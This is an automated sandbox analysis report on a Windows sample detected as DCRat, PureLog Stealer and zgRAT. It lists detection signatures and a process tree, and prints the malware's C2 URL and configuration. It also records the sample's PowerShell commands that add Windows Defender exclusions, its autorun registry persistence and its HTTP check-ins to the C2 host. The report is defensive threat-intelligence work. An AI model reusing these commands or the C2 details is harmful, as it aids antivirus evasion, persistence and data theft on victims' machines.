Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
s5duotgoYD.exe

Overview

General Information

Sample name:s5duotgoYD.exe
renamed because original name is a hash value
Original sample name:B379F4AC167609D8A3EF26444098B61D.exe
Analysis ID:1554055
MD5:b379f4ac167609d8a3ef26444098b61d
SHA1:85fe0bbbe666d72a955ee98444415194e00739eb
SHA256:430cba76bb21f0ff671a5345c15a51bd047b0f5aecf764ef4668ae9085d22b80
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • s5duotgoYD.exe (PID: 7416 cmdline: "C:\Users\user\Desktop\s5duotgoYD.exe" MD5: B379F4AC167609D8A3EF26444098B61D)
    • csc.exe (PID: 7576 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 7628 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA9C5.tmp" "c:\Windows\System32\CSC5850B7348A2C4AEC99A5FCDCA9CA019.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 8004 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8016 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ModemLogs\conhost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8036 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\twain_32\xKVBpkhCEjg.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8056 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8072 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\xKVBpkhCEjg.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8088 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s5duotgoYD.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2708 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • cmd.exe (PID: 5080 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TCq2JLUA0X.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7704 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 7936 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • RuntimeBroker.exe (PID: 4076 cmdline: "C:\Recovery\RuntimeBroker.exe" MD5: B379F4AC167609D8A3EF26444098B61D)
    • conhost.exe (PID: 7576 cmdline: C:\Windows\ModemLogs\conhost.exe MD5: B379F4AC167609D8A3EF26444098B61D)
  • backgroundTaskHost.exe (PID: 7200 cmdline: "C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe" MD5: B379F4AC167609D8A3EF26444098B61D)
  • backgroundTaskHost.exe (PID: 1608 cmdline: "C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe" MD5: B379F4AC167609D8A3EF26444098B61D)
  • conhost.exe (PID: 1732 cmdline: C:\Windows\ModemLogs\conhost.exe MD5: B379F4AC167609D8A3EF26444098B61D)
  • RuntimeBroker.exe (PID: 7660 cmdline: C:\Recovery\RuntimeBroker.exe MD5: B379F4AC167609D8A3EF26444098B61D)
  • RuntimeBroker.exe (PID: 7696 cmdline: C:\Recovery\RuntimeBroker.exe MD5: B379F4AC167609D8A3EF26444098B61D)
  • s5duotgoYD.exe (PID: 7864 cmdline: C:\Users\user\Desktop\s5duotgoYD.exe MD5: B379F4AC167609D8A3EF26444098B61D)
  • s5duotgoYD.exe (PID: 7860 cmdline: C:\Users\user\Desktop\s5duotgoYD.exe MD5: B379F4AC167609D8A3EF26444098B61D)
  • xKVBpkhCEjg.exe (PID: 7908 cmdline: C:\Recovery\xKVBpkhCEjg.exe MD5: B379F4AC167609D8A3EF26444098B61D)
  • xKVBpkhCEjg.exe (PID: 7924 cmdline: C:\Recovery\xKVBpkhCEjg.exe MD5: B379F4AC167609D8A3EF26444098B61D)
  • RuntimeBroker.exe (PID: 8240 cmdline: "C:\Recovery\RuntimeBroker.exe" MD5: B379F4AC167609D8A3EF26444098B61D)
  • svchost.exe (PID: 8644 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • conhost.exe (PID: 8784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • backgroundTaskHost.exe (PID: 9136 cmdline: "C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe" MD5: B379F4AC167609D8A3EF26444098B61D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://500154cm.n9shteam.in/eternallineHttpprocessorwindowsDatalifedleprivatecentral", "MUTEX": "DCR_MUTEX-vm4EBTsnJo8jd1Wf9GAL", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
s5duotgoYD.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    s5duotgoYD.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Recovery\xKVBpkhCEjg.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Recovery\xKVBpkhCEjg.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Recovery\RuntimeBroker.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Recovery\RuntimeBroker.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 5 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000000.00000000.1674094332.0000000000B82000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000000.00000002.1812029430.0000000013178000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    Process Memory Space: s5duotgoYD.exe PID: 7416JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      Process Memory Space: RuntimeBroker.exe PID: 8240JoeSecurity_DCRat_1Yara detected DCRatJoe Security

                        Unpacked PEs

                        SourceRuleDescriptionAuthorStrings
                        0.0.s5duotgoYD.exe.b80000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                          0.0.s5duotgoYD.exe.b80000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                            0.2.s5duotgoYD.exe.131da5f8.6.raw.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: Files With System Process Name In Unsuspected Locations
                              Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\s5duotgoYD.exe, ProcessId: 7416, TargetFilename: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe
                              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\s5duotgoYD.exe", ParentImage: C:\Users\user\Desktop\s5duotgoYD.exe, ParentProcessId: 7416, ParentProcessName: s5duotgoYD.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe', ProcessId: 8004, ProcessName: powershell.exe
                              Sigma detected: System File Execution Location Anomaly
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Windows\ModemLogs\conhost.exe, CommandLine: C:\Windows\ModemLogs\conhost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\ModemLogs\conhost.exe, NewProcessName: C:\Windows\ModemLogs\conhost.exe, OriginalFileName: C:\Windows\ModemLogs\conhost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\ModemLogs\conhost.exe, ProcessId: 1732, ProcessName: conhost.exe
                              Sigma detected: CurrentVersion Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Recovery\RuntimeBroker.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\s5duotgoYD.exe, ProcessId: 7416, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker
                              Sigma detected: CurrentVersion NT Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Recovery\RuntimeBroker.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\s5duotgoYD.exe, ProcessId: 7416, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                              Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\s5duotgoYD.exe", ParentImage: C:\Users\user\Desktop\s5duotgoYD.exe, ParentProcessId: 7416, ParentProcessName: s5duotgoYD.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.cmdline", ProcessId: 7576, ProcessName: csc.exe
                              Sigma detected: Powershell Defender Exclusion
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\s5duotgoYD.exe", ParentImage: C:\Users\user\Desktop\s5duotgoYD.exe, ParentProcessId: 7416, ParentProcessName: s5duotgoYD.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe', ProcessId: 8004, ProcessName: powershell.exe
                              Sigma detected: Dynamic CSharp Compile Artefact
                              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\s5duotgoYD.exe, ProcessId: 7416, TargetFilename: C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.cmdline
                              Sigma detected: Non Interactive PowerShell Process Spawned
                              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\s5duotgoYD.exe", ParentImage: C:\Users\user\Desktop\s5duotgoYD.exe, ParentProcessId: 7416, ParentProcessName: s5duotgoYD.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe', ProcessId: 8004, ProcessName: powershell.exe
                              Sigma detected: Windows Processes Suspicious Parent Directory
                              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8644, ProcessName: svchost.exe

                              Data Obfuscation

                              barindex
                              Sigma detected: Dot net compiler compiles file from suspicious location
                              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\s5duotgoYD.exe", ParentImage: C:\Users\user\Desktop\s5duotgoYD.exe, ParentProcessId: 7416, ParentProcessName: s5duotgoYD.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.cmdline", ProcessId: 7576, ProcessName: csc.exe

                              Suricata Signatures

                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-11-12T00:42:18.172405+010020229301A Network Trojan was detected20.12.23.50443192.168.2.449730TCP
                              2024-11-12T00:43:01.129789+010020229301A Network Trojan was detected20.12.23.50443192.168.2.449791TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-11-12T00:42:17.538372+010020480951A Network Trojan was detected192.168.2.44973137.44.238.25080TCP

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus / Scanner detection for submitted sample
                              Source: s5duotgoYD.exeAvira: detected
                              Antivirus detection for URL or domain
                              Source: http://500154cm.n9shteam.in/eternallineHttpprocessorwindowsDatalifedleprivatecentral.phpAvira URL Cloud: Label: malware
                              Antivirus detection for dropped file
                              Source: C:\Recovery\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\AppData\Local\Temp\TCq2JLUA0X.batAvira: detection malicious, Label: BAT/Delbat.C
                              Source: C:\Users\user\Desktop\UAuXMqPf.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\Desktop\XIsgiJJb.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                              Source: C:\Users\user\Desktop\WgRxdDkv.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                              Source: C:\Recovery\xKVBpkhCEjg.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Found malware configuration
                              Source: 00000000.00000002.1812029430.0000000013178000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://500154cm.n9shteam.in/eternallineHttpprocessorwindowsDatalifedleprivatecentral", "MUTEX": "DCR_MUTEX-vm4EBTsnJo8jd1Wf9GAL", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                              Multi AV Scanner detection for dropped file
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeReversingLabs: Detection: 65%
                              Source: C:\Recovery\RuntimeBroker.exeReversingLabs: Detection: 65%
                              Source: C:\Recovery\xKVBpkhCEjg.exeReversingLabs: Detection: 65%
                              Source: C:\Users\user\Desktop\SlQgWXuB.logReversingLabs: Detection: 37%
                              Source: C:\Users\user\Desktop\UAuXMqPf.logReversingLabs: Detection: 70%
                              Source: C:\Users\user\Desktop\WgRxdDkv.logReversingLabs: Detection: 70%
                              Source: C:\Users\user\Desktop\XIsgiJJb.logReversingLabs: Detection: 50%
                              Source: C:\Users\user\Desktop\mjoVvRUx.logReversingLabs: Detection: 37%
                              Source: C:\Users\user\Desktop\pkWDNnmN.logReversingLabs: Detection: 23%
                              Source: C:\Users\user\Desktop\vEZKvYQi.logReversingLabs: Detection: 23%
                              Source: C:\Users\user\Desktop\vlWcZFKy.logReversingLabs: Detection: 50%
                              Source: C:\Windows\ModemLogs\conhost.exeReversingLabs: Detection: 65%
                              Source: C:\Windows\twain_32\xKVBpkhCEjg.exeReversingLabs: Detection: 65%
                              Multi AV Scanner detection for submitted file
                              Source: s5duotgoYD.exeReversingLabs: Detection: 65%
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                              Machine Learning detection for dropped file
                              Source: C:\Users\user\Desktop\CjKcCUFn.logJoe Sandbox ML: detected
                              Source: C:\Recovery\RuntimeBroker.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\UAuXMqPf.logJoe Sandbox ML: detected
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\WgRxdDkv.logJoe Sandbox ML: detected
                              Source: C:\Recovery\xKVBpkhCEjg.exeJoe Sandbox ML: detected
                              Machine Learning detection for sample
                              Source: s5duotgoYD.exeJoe Sandbox ML: detected
                              Source: s5duotgoYD.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeDirectory created: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeDirectory created: C:\Program Files\Windows Portable Devices\eddb19405b7ce1Jump to behavior
                              Source: s5duotgoYD.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.pdb source: s5duotgoYD.exe, 00000000.00000002.1759280751.000000000382F000.00000004.00000800.00020000.00000000.sdmp

                              Spreading

                              barindex
                              Infects executable files (exe, dll, sys, html)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                              Networking

                              barindex
                              Suricata IDS alerts for network traffic
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49731 -> 37.44.238.250:80
                              Source: Joe Sandbox ViewIP Address: 37.44.238.250 37.44.238.250
                              Source: Joe Sandbox ViewASN Name: HARMONYHOSTING-ASFR HARMONYHOSTING-ASFR
                              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49730
                              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49791
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 384Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 1812Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 500154cm.n9shteam.inContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
